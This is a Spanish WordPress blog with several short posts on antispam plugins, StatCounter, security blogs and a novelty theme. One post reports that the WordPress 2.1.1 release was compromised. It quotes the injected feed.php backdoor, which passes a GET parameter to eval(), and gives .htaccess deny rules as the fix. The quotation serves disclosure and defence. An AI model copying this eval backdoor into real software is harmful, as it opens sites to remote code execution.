Desde hace unas horas estoy probando por aquí a Defensio, el nuevo plugin antispam para wordpress que por el momento permanece en fase de beta privada. He desactivado también los tres plugins que suelo usar de forma habitual para combatir el spam (Akismet, Trackback validator y Comment Policy) así que, si la cosa va mal, puede que temporalmente se vean por aquí mensajes poco apropiados… Ruego comprensión.

Así a primera vista tiene un aspecto bastante similar a Akismet. Defensio asigna un porcentaje de lo que el llama “Spaminess” a cada comentario recibido y guarda los mensajes que el considera spam en una página al mismo nivel que los Comentarios de tu wordpress. Además te permite a ti elegir que porcentaje (por defecto situado al 80%) se considera como spam de forma obvia y queda relegado a un segundo nivel. Mantiene, además, estadísticas no sólo con los mensajes de spam capturados sino también con los comentarios legítimos y los falsos positivos y negativos.

Ya os iré contando que tal aunque, me temo, que si el plugin no es todo lo bueno que debiera lo veréis vosotros mismos…

ACTUALIZACIÓN: Fin de la “aventura”. Las estadísticas del nuevo plugin muestran un 98,43% de eficacia con 398 mensajes de spam detectados correctamente y 10 falsos positivos. Me vuelvo con Akismet.

Statcounter, uno de los servicios más veteranos y completos en proporcionar estadísticas a nuestras webs y blogs y de los pocos que lo hacen en tiempo real ha decididido aumentar el tamaño de sus logs en la modalidad gratuita hasta 500 entradas. El procedimiento de actualización no es automático: para que tenga efecto has de entrar en tu cuenta de statcounter y seguir las instrucciones que te habrán enviado por correo electrónico o que publican en su blog.

To increase your log size, log into StatCounter and click the wrench icon beside your project. Click ‘Adjust Log Size’, and enter 500 in the box. Click ‘Adjust Project Log’ and you’re done!

Y, ya que estamos, si usas wordpress el perfecto compañero para tu cuenta de statcounter es el plugin de Luke’s Lot que introduce de forma automática el código necesario para que las visitas a tu blog queden registradas evitando al mismo tiempo que los rastros de tu paso por el mismo aparezcan contabilizados.

Hay dos blogs que se están convirtiendo en referencias imprescindibles para todos los castellano-parlantes que usamos wordpress. Uno de ellos es Buayacorp que informa y difunde puntualmente valiosa y detallada información sobre los (por desgracia cada vez más habituales) fallos de seguridad de este popular CMS. Por ejemplo este o este. El segundo es el de los hermanos Carrero que, aparte de realizar unas inmejorables traducciones del sistema, difunden de forma cómoda para los neófitos los parches necesarios para cubrir estas vulnerabilidades mientras que se publica una actualización oficial. Desde aquí mis felicitaciones a ambos.

Si has descargado e instalado la versión 2.1.1 de wordpress durante la última semana que sepas que tienes un pequeño problema que resolver. Algo así es lo que dicen en su blog oficial. Por lo visto un cracker ha tenido acceso al código de esta versión durante los últimos días y ha introducido en el mismo unas líneas que permiten la ejecución arbitraria de código de forma remota, concretamente en los ficheros feed.php y theme.php.

Para los curiosos, en buayacorp nos muestran el código introducido en el fichero feed.php:

function comment_text_phpfilter($filterdata) {
eval($filterdata);
}

...

if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

La solución pasa por dar la mayor difusión a la noticia (para los despistados que no lean las notas que wordpress publica en su tablero inicial), actualizar lo antes posible a la nueva versión 2.1.2 que corrige este y, “poyaque” estamos, otros problemas o si no te es posible esto último usar la solución alternativa que sugieren en el blog de dreamhost e introducir las siguientes reglas de bloqueo en el fichero .htaccess de tu apache:

< Files theme.php >
order allow,deny
deny from all
< /Files >

< Files feed.php >
order allow,deny
deny from all
< /Files >

Sin lugar a dudas se trata del tema para wordpress más friky que he visto jamás. Si no fuese porque seguro que mi madre no sabría que hacer con el lo instalaría de inmediato… (Qué excusa más tonta… Mi madre no sabe siquiera que esto existe). Disponible en dos versiones: la 1 en el tradicional fósforo verde de toda la vida y la 2 (aún en beta) en un lila bastante menos agresivo para la vista (“clickear” sobre las imágenes para acceder a ellos).

Visto en TuxHuellas.